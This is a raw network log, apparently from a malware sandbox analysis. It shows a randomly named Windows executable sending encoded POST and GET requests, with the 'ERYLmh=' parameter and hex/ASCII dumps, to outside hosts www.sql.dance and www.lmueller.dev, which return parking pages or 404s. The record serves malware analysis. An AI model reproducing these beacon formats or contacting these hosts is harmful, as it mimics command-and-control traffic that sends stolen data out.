7	192.168.2.11	49930	199.59.243.228	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:52:59.127347946 CET	1768	OUT	POST /11n4/ HTTP/1.1 Host: www.sql.dance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1235 Cache-Control: max-age=0 Connection: close Origin: http://www.sql.dance Referer: http://www.sql.dance/11n4/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 64 34 70 59 57 59 79 6d 75 6e 43 62 4e 56 78 6c 7a 4c 46 2f 78 48 2f 73 55 4e 6d 53 45 43 38 45 56 6a 49 78 47 79 78 58 43 67 4c 47 48 72 47 73 47 4b 4b 30 79 4d 4d 56 4f 7a 6f 30 48 79 53 6f 2b 6a 6f 61 62 4f 62 49 39 50 54 4a 63 39 62 48 37 70 65 33 56 4d 6f 39 50 59 31 37 32 51 2f 4f 4e 46 4a 33 55 51 34 75 58 68 69 6f 35 41 68 54 6e 74 2f 67 4d 33 59 6c 31 53 65 7a 41 41 66 4a 50 64 45 78 48 77 6f 55 52 71 4c 73 4b 67 33 5a 68 79 67 5a 50 73 64 4f 44 55 64 76 5a 6e 48 50 4d 72 53 58 55 30 41 43 39 59 7a 55 33 62 55 4a 65 78 38 44 63 6a 55 2f 76 33 48 6e 4f 4d 6d 59 79 53 5a 6c 57 4a 51 56 65 34 74 68 2b 33 72 39 6d 66 42 41 6b 6a 42 32 51 7a 48 2b 69 51 67 32 77 61 67 45 7a 34 72 43 4f 63 61 6d 33 67 7a 63 4e 6f 75 74 56 52 75 49 6c 33 6a 6a 4b 79 4a 65 4f 6d 53 74 77 68 67 64 4c 51 33 73 78 33 75 36 51 43 6b 33 58 51 7a 63 6f 75 57 7a 44 2b 4e 77 32 7a 4b 50 39 39 54 78 6d 6a 76 71 75 33 38 77 30 4d 76 48 64 6b 2b 67 6d 39 64 38 53 38 66 77 34 69 65 47 74 49 63 6c 72 6f 72 [TRUNCATED] Data Ascii: ERYLmh=d4pYWYymunCbNVxlzLF/xH/sUNmSEC8EVjIxGyxXCgLGHrGsGKK0yMMVOzo0HySo+joabObI9PTJc9bH7pe3VMo9PY172Q/ONFJ3UQ4uXhio5AhTnt/gM3Yl1SezAAfJPdExHwoURqLsKg3ZhygZPsdODUdvZnHPMrSXU0AC9YzU3bUJex8DcjU/v3HnOMmYySZlWJQVe4th+3r9mfBAkjB2QzH+iQg2wagEz4rCOcam3gzcNoutVRuIl3jjKyJeOmStwhgdLQ3sx3u6QCk3XQzcouWzD+Nw2zKP99Txmjvqu38w0MvHdk+gm9d8S8fw4ieGtIclror12UTzZOUIRUK3zsDYa0MJrdevefA1PdXkXFvK8Bk+PFyADwTsKM46NkUVrWGDrwJ1bzasFIj7FViFDDjp0PcI8yJWXk7PxrsjzRgBx/RmkHkthB1tyjTDRYWz+BhrYk2ojbxbvdVGPrkhwzEa0Qqs3omXfOuLNoUd7XoRmyb6c/Px/n5Hfam7Q8KQ9DDqg1mSdxwt6uWWzmotah1zFw/zZAOJu/xA8saNbDSl6/rpyc5c6rp/1hEisasUYJX0q1TCPcuCOAO9UYGM4Cs3g8ulCBamk6+C50m5ltBkxMyDd68n6knDwoDfXZR2QIqX0+UuExnI+MAavN/yaAgKUa6rsCSmFyQBW/qwS0Fniyjt5QFq1mZ/qHNtkYHKp/HZ/9iqDLDo2C5fQZCVVceYFTATBN/xLVXCNbnzCXOPom2wq27+oMdjljPRSa92wRaNBlY8lCkS1DJxkpmrohzVWVnE8xAsI6U0XVTN67oobKVoCLUMluUda72hg+K3b37e72563xvfAgAyht2pb8K7sQ9249xjkRvdFytpdCnWTQfFGwnu8ZWxqn09I1IFFTRRRYsM25ukvNScfx03iZuzpNYZZ349I1GbKkhqkn2Q8EGwTddcdSCKjJeCEaNwVJWenT6jRRzIMUNnKQQXxpd831JeylYbFkeeqee6k [TRUNCATED]
Jan 10, 2025 19:52:59.565756083 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:52:59 GMT content-type: text/html; charset=utf-8 content-length: 1102 x-request-id: 10af2fb2-d100-4c1c-a446-3d801bc8fdee cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qP+4r39ShRcj2Lss3RmPghrCdmVE4EDnwacsCD1VVFA9MRNSE1l2dki+yNAIK3rnif/Qz+C9gogxO6OnqIfWEQ== set-cookie: parking_session=10af2fb2-d100-4c1c-a446-3d801bc8fdee; expires=Fri, 10 Jan 2025 19:07:59 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 50 2b 34 72 33 39 53 68 52 63 6a 32 4c 73 73 33 52 6d 50 67 68 72 43 64 6d 56 45 34 45 44 6e 77 61 63 73 43 44 31 56 56 46 41 39 4d 52 4e 53 45 31 6c 32 64 6b 69 2b 79 4e 41 49 4b 33 72 6e 69 66 2f 51 7a 2b 43 39 67 6f 67 78 4f 36 4f 6e 71 49 66 57 45 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qP+4r39ShRcj2Lss3RmPghrCdmVE4EDnwacsCD1VVFA9MRNSE1l2dki+yNAIK3rnif/Qz+C9gogxO6OnqIfWEQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 19:52:59.565783978 CET	555	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTBhZjJmYjItZDEwMC00YzFjLWE0NDYtM2Q4MDFiYzhmZGVlIiwicGFnZV90aW1lIjoxNzM2NTM1MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49946	199.59.243.228	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:01.669591904 CET	471	OUT	GET /11n4/?ERYLmh=Q6B4Vv6H/HmLDGJrwI0OhVXjXZHTCh42S0IrLUtTNR3dM5L2Pp6KnadiPCYNEEaz6Rg+ZfDzycGjYNn5/pubR8oyDYBu1hbKKFItG0JEeDKr9yYwr/OIGls=&X6H8=IvQt7 HTTP/1.1 Host: www.sql.dance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Jan 10, 2025 19:53:02.114497900 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 18:53:01 GMT content-type: text/html; charset=utf-8 content-length: 1446 x-request-id: 5ab04af3-876d-4f6d-b001-dd75bfb2bb75 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pD8JB9+2xE6V3ZV4SZT+mCmb7jPln4QPL0pU8EJqZHFBEWFIlXtbr4DyGAEUJ6qD2JGOkjQWDPC7UtjKh5jOIA== set-cookie: parking_session=5ab04af3-876d-4f6d-b001-dd75bfb2bb75; expires=Fri, 10 Jan 2025 19:08:02 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 44 38 4a 42 39 2b 32 78 45 36 56 33 5a 56 34 53 5a 54 2b 6d 43 6d 62 37 6a 50 6c 6e 34 51 50 4c 30 70 55 38 45 4a 71 5a 48 46 42 45 57 46 49 6c 58 74 62 72 34 44 79 47 41 45 55 4a 36 71 44 32 4a 47 4f 6b 6a 51 57 44 50 43 37 55 74 6a 4b 68 35 6a 4f 49 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pD8JB9+2xE6V3ZV4SZT+mCmb7jPln4QPL0pU8EJqZHFBEWFIlXtbr4DyGAEUJ6qD2JGOkjQWDPC7UtjKh5jOIA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 19:53:02.114543915 CET	899	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWFiMDRhZjMtODc2ZC00ZjZkLWIwMDEtZGQ3NWJmYjJiYjc1IiwicGFnZV90aW1lIjoxNzM2NTM1MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49972	46.38.243.234	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:07.336925030 CET	744	OUT	POST /w0kg/ HTTP/1.1 Host: www.lmueller.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: max-age=0 Connection: close Origin: http://www.lmueller.dev Referer: http://www.lmueller.dev/w0kg/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 74 66 78 2f 75 68 37 38 61 44 4c 75 52 59 52 50 41 6e 74 36 4b 48 38 71 6b 38 61 58 5a 4e 42 30 42 33 6f 38 4b 53 4a 6a 4e 41 67 56 55 48 6e 44 50 72 47 55 55 59 51 43 31 62 67 45 4c 77 59 6a 58 34 79 43 4f 4e 35 6e 33 69 70 71 56 47 64 6f 77 77 2b 75 34 70 67 46 31 43 2f 56 5a 48 37 38 65 2f 50 63 41 79 65 67 36 61 7a 49 77 57 64 53 77 37 65 54 6c 42 74 48 54 2b 49 67 42 46 79 77 72 68 58 78 59 5a 49 63 32 72 53 45 6b 75 43 4c 33 6e 6a 30 2b 66 4a 74 51 73 2b 51 44 43 41 56 5a 73 51 70 35 43 4f 56 69 56 70 76 45 52 4a 46 6c 4a 69 63 44 4f 70 6a 75 50 32 53 56 44 4e 37 2f 51 3d 3d Data Ascii: ERYLmh=tfx/uh78aDLuRYRPAnt6KH8qk8aXZNB0B3o8KSJjNAgVUHnDPrGUUYQC1bgELwYjX4yCON5n3ipqVGdoww+u4pgF1C/VZH78e/PcAyeg6azIwWdSw7eTlBtHT+IgBFywrhXxYZIc2rSEkuCL3nj0+fJtQs+QDCAVZsQp5COViVpvERJFlJicDOpjuP2SVDN7/Q==
Jan 10, 2025 19:53:07.901907921 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:50:26 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49984	46.38.243.234	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:09.893435955 CET	764	OUT	POST /w0kg/ HTTP/1.1 Host: www.lmueller.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: max-age=0 Connection: close Origin: http://www.lmueller.dev Referer: http://www.lmueller.dev/w0kg/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 74 66 78 2f 75 68 37 38 61 44 4c 75 41 49 42 50 43 41 42 36 62 58 38 72 34 4d 61 58 53 74 42 34 42 33 55 38 4b 54 39 4b 52 6b 4d 56 56 6e 33 44 4f 71 47 55 54 59 51 43 67 72 67 4e 46 51 59 71 58 34 32 77 4f 50 39 6e 33 6a 4e 71 56 44 5a 6f 77 48 4b 74 35 35 67 44 2b 69 2f 58 64 48 37 38 65 2f 50 63 41 7a 2b 4f 36 61 72 49 7a 6d 4e 53 68 71 65 51 72 68 74 45 51 2b 49 67 46 46 79 30 72 68 58 70 59 59 46 4c 32 6f 36 45 6b 73 4b 4c 33 79 44 33 33 66 4a 72 50 38 2f 62 4e 48 78 69 41 74 42 7a 33 44 71 68 6a 58 31 75 46 58 45 66 31 71 72 4c 41 64 68 68 36 70 58 69 63 79 6f 79 6b 55 75 4e 57 56 56 4c 2b 73 70 77 62 31 2b 48 56 79 4e 63 6e 75 51 3d Data Ascii: ERYLmh=tfx/uh78aDLuAIBPCAB6bX8r4MaXStB4B3U8KT9KRkMVVn3DOqGUTYQCgrgNFQYqX42wOP9n3jNqVDZowHKt55gD+i/XdH78e/PcAz+O6arIzmNShqeQrhtEQ+IgFFy0rhXpYYFL2o6EksKL3yD33fJrP8/bNHxiAtBz3DqhjX1uFXEf1qrLAdhh6pXicyoykUuNWVVL+spwb1+HVyNcnuQ=
Jan 10, 2025 19:53:11.559299946 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:50:29 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Jan 10, 2025 19:53:11.559361935 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:50:29 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Jan 10, 2025 19:53:11.559539080 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 18:50:29 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	49985	46.38.243.234	80	5512	C:\Program Files (x86)\NoPxCaPWCQgiYjuZQMgSioBkcgmYFBNsZHAbqieTNjLKlugCeRRHTTt\UNUqLBRwwpkr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:53:12.439162016 CET	1777	OUT	POST /w0kg/ HTTP/1.1 Host: www.lmueller.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1235 Cache-Control: max-age=0 Connection: close Origin: http://www.lmueller.dev Referer: http://www.lmueller.dev/w0kg/ User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57) Data Raw: 45 52 59 4c 6d 68 3d 74 66 78 2f 75 68 37 38 61 44 4c 75 41 49 42 50 43 41 42 36 62 58 38 72 34 4d 61 58 53 74 42 34 42 33 55 38 4b 54 39 4b 52 6b 45 56 56 55 76 44 4f 4a 2b 55 53 59 51 43 38 37 67 49 46 51 5a 36 58 38 69 30 4f 50 78 33 33 67 6c 71 54 56 6c 6f 68 47 4b 74 7a 35 67 44 78 43 2f 57 5a 48 37 54 65 35 76 59 41 79 53 4f 36 61 72 49 7a 6b 46 53 68 37 65 51 37 52 74 48 54 2b 4a 76 42 46 7a 54 72 68 50 35 59 59 51 32 32 59 61 45 6b 4d 61 4c 6b 57 6a 33 71 76 4a 70 4f 38 2b 62 4e 48 31 39 41 74 64 33 33 44 65 62 6a 56 31 75 46 6a 46 5a 77 34 65 49 45 64 74 37 71 2f 6e 66 65 79 63 73 39 56 53 55 51 31 70 72 38 5a 64 36 57 55 65 43 49 53 35 70 35 37 69 6f 46 42 78 54 7a 35 77 51 49 33 62 74 49 76 38 44 71 74 6c 51 31 6a 73 37 50 7a 36 66 51 6d 39 43 73 70 76 34 6d 64 41 7a 51 31 50 61 59 56 30 52 38 6f 62 2b 6d 70 54 44 35 52 70 57 48 6d 61 6b 43 5a 31 6e 72 56 62 56 62 6c 58 62 39 56 39 2b 4a 68 36 30 55 32 4d 46 63 74 4f 6d 56 55 4d 4d 38 5a 50 63 64 35 6d 6d 55 70 76 56 73 73 2b 41 30 53 74 [TRUNCATED] Data Ascii: ERYLmh=tfx/uh78aDLuAIBPCAB6bX8r4MaXStB4B3U8KT9KRkEVVUvDOJ+USYQC87gIFQZ6X8i0OPx33glqTVlohGKtz5gDxC/WZH7Te5vYAySO6arIzkFSh7eQ7RtHT+JvBFzTrhP5YYQ22YaEkMaLkWj3qvJpO8+bNH19Atd33DebjV1uFjFZw4eIEdt7q/nfeycs9VSUQ1pr8Zd6WUeCIS5p57ioFBxTz5wQI3btIv8DqtlQ1js7Pz6fQm9Cspv4mdAzQ1PaYV0R8ob+mpTD5RpWHmakCZ1nrVbVblXb9V9+Jh60U2MFctOmVUMM8ZPcd5mmUpvVss+A0StkLfChxffjDtOgqvrTpFY/55D5PHSeAlaZx4RDCWlD6UGzF21No0yMwsDHHs8mBH4+aZn2XfSW1A/x6tZPSsRkBQODZ0hiWeFWUmXygCe5l9XbOzHbno50y67sAMu3AoIDD58zH05s/E4oGP2nF8W7bN+43G4GI5n0LPwIWnMN9eXpzTxXuPCNjDd7I0vHhjP+sZ1oLOR88PDRSXjNH2UDbmLdpnE+AygSnGMDB2AXmilEaMcKKm5asLfEgRwSecNq/Twzy+4rhAYwKlC9FhL4k2m0993DTmTzt3YbkVxCc5O7A/MztXBl5SsAQM2D2BvC8laCLliYvsZJFvP29RstQhx/uLHBE3ey8wSu3KQ9+m1VxAbeIoBHae5hdhth6P5Ld/w3UyTJpWJRX4PG6Y5cDF0xSm5+GOJvLZkEyvBZcyaE++KbScLkbt5VYNKVIEXrVrteLjJGFYbfwJLSfqpbYoNBr8lwOThzm3pH5An0x3wzl7rJLX/EleyUrzn+PlQZFaovFt+pA5ArvvU68IRZwYLA7lQhq/C9AIdJL4EXrb4tXywnUzqqz5cMxvhXfSXpEUVa4SL9solTORsrsAF4m4NA7EG3kPzuuszzblXPnqASVZCsuq45vT5KiwNKaKmyUFWQlDvc804VUAWIpKSecRCW/CVeqmMSM 